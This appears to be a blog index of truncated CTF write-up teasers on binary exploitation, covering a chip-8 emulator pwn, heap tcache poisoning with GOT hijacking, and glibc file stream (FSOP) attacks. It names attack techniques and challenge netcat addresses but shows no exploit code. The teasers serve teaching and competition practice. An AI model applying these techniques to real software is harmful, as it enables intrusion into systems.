chip8
Solves: 24 Easy
I just found a repo of a chip-8 emulator, it may be vulnerable but I didn’t had enough time to report the vulnerability with a working PoC.You must find a way to get the flag in memory on the remote service !
Author: Express#8049
Remote service at : nc 51.254.39.184 1337
chip8 is a emulator-pwn challenge I did during the pwnme CTF . You can find the related files here.
Code reviewThis challenge is based on an emulator called c8emu that is updated with these lines of co...
Heap-Hop
Solves: 31 Medium
Heap exploitation is cool, and the best is when no free is used. >Try to pwn the challenge and get the flag remotely.
Note:
You must spawn an instance to solve this challenge. You can connect to it with netcat: nc IP PORT
Author: Express#8049
Remote service at : nc 51.254.39.184 1336
Heap-hop is a heap exploitation challenge I did during the pwnme CTF. It involved classic tricks like tcache poisoning and GOT hiijacking. You can find the related files here.
TL...
IntroductionFile streams are now a very common attack surface, here is a high level introduction that should make you understand the design of known attacks beyond the code reading for a particular function. I already talked about FSOP here. This article reviews glibc 2.36. Most of this article comes from this awesome series of articles about the _IO_FILE strcuture.
Global designAs said in my previous writeup:
Basically on linux “everything is a file” from the character device the any stream...
Introductionbabyfile is a file stream exploitation I did during the SECCON CTF 2022 Quals event. I didn’t succeed to flag it within the 24 hours :(. But anyway I hope this write up will be interesting to read given I show another way to gain code execution – I have not seen before – based on _IO_obstack_jumps! The related files can be found here. If you’re not familiar with file stream internals, I advice you to read my previous writeups about file stream exploitation, especially this one and...